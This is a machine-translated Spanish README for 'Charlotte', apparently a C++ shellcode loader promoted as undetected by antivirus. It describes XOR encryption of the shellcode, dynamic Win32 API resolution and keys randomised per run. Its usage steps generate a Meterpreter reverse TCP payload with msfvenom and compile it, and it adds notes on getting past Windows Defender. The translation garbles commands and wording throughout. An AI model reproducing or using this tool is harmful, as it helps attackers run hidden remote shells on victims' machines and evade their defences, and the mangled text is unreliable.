Charlotte es un atleta de shellcode completamente desconocido para C ++.
descripción
- 13/05/2021:
- c ++: atleta de Shellcode, completamente sin ser detectado 0/26 desde el 13 de mayo de 2021.
- indicación dinámica de funciones de la API de Win32
- Secreto XOR del código de shell y nombres de funciones
- claves y variables XOR aleatorias por ejecución
- bajo Kali Linux simplemente ‘apt-get install mingw-w64 *’ ¡y eso es todo!
- 17/05/2021:
- distancia de condena aleatoria y distancia de secreto XOR
Antiscan.me
usar
git clona el repositorio, genera tu archivo shellcode llamado beacon.bin y ejecuta charlotte.py
Ejemplo:
clon de git https://github.com/9emin1/charlotte.git && apt-get install mingw-w64 *
CD Charlotte
msfvenom -p windows / x64 / meterpreter_reverse_tcp LHOST = $ YOUR_IP LPORT = $ YOUR_PORT -f raw> beacon.bin
pitón charlotte.py
beneficio
probado con msfvenom -p (ver .gif POC a continuación) y igualmente con la carga útil de formato sin procesar de Cobalt Strike
Aggiornamento v1.1
17/05/21:
Aparentemente, Microsoft Windows Defender pudo detectar el binario .DLL y ¿cómo se marcó? Al despabilarse varias teclas XOR de 16 bytes de tamaño, cámbielo a 9 que se muestra en el POC .gif a continuación muestra que ahora no se ha descubierto nuevamente. Saludos.